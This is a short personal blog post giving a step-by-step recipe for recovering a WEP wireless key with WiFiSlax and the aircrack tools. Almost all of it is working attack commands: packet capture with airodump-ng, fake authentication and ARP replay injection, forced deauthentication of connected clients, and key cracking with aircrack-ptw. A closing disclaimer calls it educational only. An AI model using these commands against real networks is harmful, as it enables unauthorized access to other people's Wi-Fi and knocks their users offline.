//=]
This tutorial show your how to retrieve WEP Key using WiFiSlax and Intel Centrino Chipset.
startxecho 'Channel‘ > /sys/class/net/wifi0/device/channel
airodump-ng rtap0
Finish the execution with CONTROL-C
echo 'BSSID‘ > /sys/class/net/wifi0/device/bssid
airodump-ng -c CHANNEL -w /path/to/save/OUTPUT_FILE rtap0
echo '2' > /sys/class/net/wifi0/device/rate
ifconfig wifi0 up
aireplay-ng -1 0 AP_BSSID -h YOUR_MAC_ADDRESS_WIFI -e AP_ESSID wifi0
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h YOUR_MAC_ADDRESS_WIFI wifi0
This should increment the number of data in capture window.
Deauthenticate Clients if needed to increase the ARP request capture, type:
aireplay-ng -0 15 -a AP_BSSID -c CLIENT_MAC_ADDRESS_WIFI wifi0
When the data packet between 40,000 and 85,000+ data, extract the key by executing:
aircrack-ptw /path/to/save/OUTPUT_FILE.cap
and voila..
Found key with len 05: XX XX XX XX XX
where XX XX XX XX is WEP Key
This is manual tip using WIfiSlax. I will give you easy way how to retrieve WEP key using the same tool..
DISCLAIMER: This is for testing environment and educational purpose only. I cannot guarantee the accuracy or validity of the material submitted. You agree that your use of the tips and your reliance on any questions, answers, information or other materials received through this site is at your own risk.
Hariadi.org is the personal site of Hariadi Hinta, a web coder, and photographer living in Putrajaya, Malaysia. Check out the archives, find out more about me or even get in touch..
Leave a reply